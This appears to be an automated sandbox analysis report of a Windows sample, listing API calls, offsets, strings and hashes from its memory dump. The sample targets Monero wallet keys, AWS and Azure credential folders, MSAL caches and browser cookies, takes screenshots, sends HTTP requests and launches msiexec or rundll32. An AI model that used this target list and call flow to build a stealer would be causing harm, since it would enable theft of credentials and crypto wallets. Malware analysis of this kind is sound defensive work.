                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA5BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0130EE78,00000000,?,0130A958,00000000,?,00BC1B4C), ref: 00BA5EC1
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA5EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA5EEA
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5EFF
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA5F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00BA5F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA5F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BA5F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6000
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA600D
                                  • HttpOpenRequestA.WININET(00000000,0130EE68,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA5C48
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6017
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: ed34ce238f31b5672c83aa2b84ba0e5eef22b74a24bbda81549663efe9d970a8
                                  • Instruction ID: cb987b0e214b19189f15f05d4cfd91038bb1781ee2f506e53ccc811a81165bfa
                                  • Opcode Fuzzy Hash: ed34ce238f31b5672c83aa2b84ba0e5eef22b74a24bbda81549663efe9d970a8
                                  • Instruction Fuzzy Hash: CA12CD71D20118BBCB25EBA0DDA6FEEB7B9AF14700F4045D9B11672091EFB06A48CF65
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BAD1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BAD1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD308
                                  • lstrcat.KERNEL32(?,00BC1570), ref: 00BAD317
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD32A
                                  • lstrcat.KERNEL32(?,00BC1574), ref: 00BAD339
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD34C
                                  • lstrcat.KERNEL32(?,00BC1578), ref: 00BAD35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD36E
                                  • lstrcat.KERNEL32(?,00BC157C), ref: 00BAD37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD390
                                  • lstrcat.KERNEL32(?,00BC1580), ref: 00BAD39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD3B2
                                  • lstrcat.KERNEL32(?,00BC1584), ref: 00BAD3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD3D4
                                  • lstrcat.KERNEL32(?,00BC1588), ref: 00BAD3E3
                                    • Part of subcall function 00BBAB30: lstrlen.KERNEL32(00BA4F55,?,?,00BA4F55,00BC0DDF), ref: 00BBAB3B
                                    • Part of subcall function 00BBAB30: lstrcpy.KERNEL32(00BC0DDF,00000000), ref: 00BBAB95
                                  • lstrlen.KERNEL32(?), ref: 00BAD42A
                                  • lstrlen.KERNEL32(?), ref: 00BAD439
                                    • Part of subcall function 00BBAD80: StrCmpCA.SHLWAPI(00000000,00BC1568,00BAD2A2,00BC1568,00000000), ref: 00BBAD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD4B4
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 4a76613a957911db1b4a0aac5f4077abf556d573edccf01f34702a49f936576b
                                  • Instruction ID: 8857cef69f7cc3dfc119d8a88a896b91094c5ee1b26938eda91c92e8ec652109
                                  • Opcode Fuzzy Hash: 4a76613a957911db1b4a0aac5f4077abf556d573edccf01f34702a49f936576b
                                  • Instruction Fuzzy Hash: 19E13D71D10108AFCF14EBA4DD96EFE77B9AF14301F0045E8F116B61A2DE71AA48CB62
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0130D968,00000000,?,00BC1544,00000000,?,?), ref: 00BACB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BACB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00BACB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BACBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BACBD9
                                  • StrStrA.SHLWAPI(?,0130D998,00BC0B56), ref: 00BACBF7
                                  • StrStrA.SHLWAPI(00000000,0130DA28), ref: 00BACC1E
                                  • StrStrA.SHLWAPI(?,0130E118,00000000,?,00BC1550,00000000,?,00000000,00000000,?,01309488,00000000,?,00BC154C,00000000,?), ref: 00BACDA2
                                  • StrStrA.SHLWAPI(00000000,0130E198), ref: 00BACDB9
                                    • Part of subcall function 00BAC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC971
                                    • Part of subcall function 00BAC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC97C
                                  • StrStrA.SHLWAPI(?,0130E198,00000000,?,00BC1554,00000000,?,00000000,013093C8), ref: 00BACE5A
                                  • StrStrA.SHLWAPI(00000000,013096A8), ref: 00BACE71
                                    • Part of subcall function 00BAC920: lstrcat.KERNEL32(?,00BC0B47), ref: 00BACA43
                                    • Part of subcall function 00BAC920: lstrcat.KERNEL32(?,00BC0B4B), ref: 00BACA57
                                    • Part of subcall function 00BAC920: lstrcat.KERNEL32(?,00BC0B4E), ref: 00BACA78
                                  • lstrlen.KERNEL32(00000000), ref: 00BACF44
                                  • CloseHandle.KERNEL32(00000000), ref: 00BACF9C
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 9ac0fae920fe3e24c62e49c81b7fd727aee50d35ae8b1cc6b584776f97f0c062
                                  • Instruction ID: d27b07a08355822309d9819638ec6e97322cff854c015b334bef2073d83d9bf6
                                  • Opcode Fuzzy Hash: 9ac0fae920fe3e24c62e49c81b7fd727aee50d35ae8b1cc6b584776f97f0c062
                                  • Instruction Fuzzy Hash: 1FE1C971D10108AFCB14EBA4DDA2FFEBBB9AF54300F404599F11676191EFB06A49CB61
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0130BBA0,00000000,00020019,00000000,00BC05BE), ref: 00BB8534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB85B6
                                  • wsprintfA.USER32 ref: 00BB85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8629
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: b984c573c502e65926a82d9c210b4b8323c89cd8e73c81a65b18546e603bfbab
                                  • Instruction ID: d8c49ff277f868cc49cc187690235a2a8c17db157e9500607925227d4396766b
                                  • Opcode Fuzzy Hash: b984c573c502e65926a82d9c210b4b8323c89cd8e73c81a65b18546e603bfbab
                                  • Instruction Fuzzy Hash: 1A81E971911118AFDB24DB54CD95FEAB7B8FB48704F5082D8E149A6190DFB06F88CFA0
                                  APIs
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB5000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00BB501D
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4B7C
                                    • Part of subcall function 00BB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BB4B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00BB50A9
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB4BC1
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4BD7
                                    • Part of subcall function 00BB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4DCD
                                    • Part of subcall function 00BB4B60: FindClose.KERNEL32(000000FF), ref: 00BB4DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB5118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BB5135
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4C00
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC08D3), ref: 00BB4C15
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4C32
                                    • Part of subcall function 00BB4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00BB4C6E
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,0130EDA8), ref: 00BB4C9A
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,00BC0FE0), ref: 00BB4CAC
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,?), ref: 00BB4CC0
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,00BC0FE4), ref: 00BB4CD2
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,?), ref: 00BB4CE6
                                    • Part of subcall function 00BB4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00BB4CFC
                                    • Part of subcall function 00BB4B60: DeleteFileA.KERNEL32(?), ref: 00BB4D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: e6b5afccdb0158b2536e8ca0cb8767aa1444d92994883f8d84d86126c46b1c90
                                  • Instruction ID: 3d1ec0496870fc15423869e4fa4d6172b5de167af83ff165d1b188e1e404927f
                                  • Opcode Fuzzy Hash: e6b5afccdb0158b2536e8ca0cb8767aa1444d92994883f8d84d86126c46b1c90
                                  • Instruction Fuzzy Hash: F54184BA94420467DB60F770DC57FED73A89B65700F0049D8B299750D2EEF497C88B92
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BB91FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: 27b9dc2e9e58a4c15e988d1624bbc1b51a253e7b57f34d212d848ac8868c7fed
                                  • Instruction ID: 6d8795733d2c7e08aa78c9ca40301c6256f56c08684b3202adc91dce6ae6756d
                                  • Opcode Fuzzy Hash: 27b9dc2e9e58a4c15e988d1624bbc1b51a253e7b57f34d212d848ac8868c7fed
                                  • Instruction Fuzzy Hash: 4B71EEB5A14208AFDB14DFE5DC85FEEB7B8BF48700F108548F65AA7290DB74A944CB60
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB3415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB35AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 3d5b29054da5670355bc47a3ef98a3004a059b9b8ac5a4aa4551be14df1a2622
                                  • Instruction ID: 10e28e27f8310718b6ba80730479b5f5aa21db4f80fde089773ab5c9bbbb1b88
                                  • Opcode Fuzzy Hash: 3d5b29054da5670355bc47a3ef98a3004a059b9b8ac5a4aa4551be14df1a2622
                                  • Instruction Fuzzy Hash: 2A12DA71D10118ABCB18FBA0DDA2FFDB7B9AF14300F4045D9E11666192EFB46B49CBA1
                                  APIs
                                    • Part of subcall function 00BA9A50: InternetOpenA.WININET(00BC0AF6,00000001,00000000,00000000,00000000), ref: 00BA9A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 00BA9CAF
                                  • lstrcat.KERNEL32(?,00BC12C4), ref: 00BA9CC1
                                  • lstrcat.KERNEL32(?,?), ref: 00BA9CD5
                                  • lstrcat.KERNEL32(?,00BC12C8), ref: 00BA9CE7
                                  • lstrcat.KERNEL32(?,?), ref: 00BA9CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 00BA9D0D
                                  • lstrlen.KERNEL32(00000000), ref: 00BA9D17
                                  • lstrlen.KERNEL32(00000000), ref: 00BA9D26
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: c099170279f0b8043e3c2407b2b17c28a8efd5a9eae6e5dba802f84ddddd7528
                                  • Instruction ID: 9ef4b451dddc8a3fc746c50d172e6133ae406b121e584877bd5af5df3213dbdf
                                  • Opcode Fuzzy Hash: c099170279f0b8043e3c2407b2b17c28a8efd5a9eae6e5dba802f84ddddd7528
                                  • Instruction Fuzzy Hash: 575182B5D10508ABCB14EBE4DC95FEE73B8AF05301F404598F21AA7091EF709A88CF61
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA62D0: InternetOpenA.WININET(00BC0DFF,00000001,00000000,00000000,00000000), ref: 00BA6331
                                    • Part of subcall function 00BA62D0: StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6353
                                    • Part of subcall function 00BA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA62D0: HttpOpenRequestA.WININET(00000000,GET,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA63D5
                                    • Part of subcall function 00BA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA640F
                                    • Part of subcall function 00BA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA6421
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5568
                                  • lstrlen.KERNEL32(00000000), ref: 00BB557F
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00BB55B4
                                  • lstrlen.KERNEL32(00000000), ref: 00BB55D3
                                  • lstrlen.KERNEL32(00000000), ref: 00BB55FE
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 5c189d2bd093997c2f514ccbe167a7576746b798385e53ae7f0cbee44c856817
                                  • Instruction ID: ed968ceaa326bc303e70f5e96552f0fbc3849104cd9e1a701027f44fad22b172
                                  • Opcode Fuzzy Hash: 5c189d2bd093997c2f514ccbe167a7576746b798385e53ae7f0cbee44c856817
                                  • Instruction Fuzzy Hash: 3651DB70A10108ABCF24EF64DDA7BFD77B9AF10340F504498E41A67592EFB06B45CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 6b537c5227b297e5fca4045d0974d1f889ee5964d7efd236da2cda6f25e22505
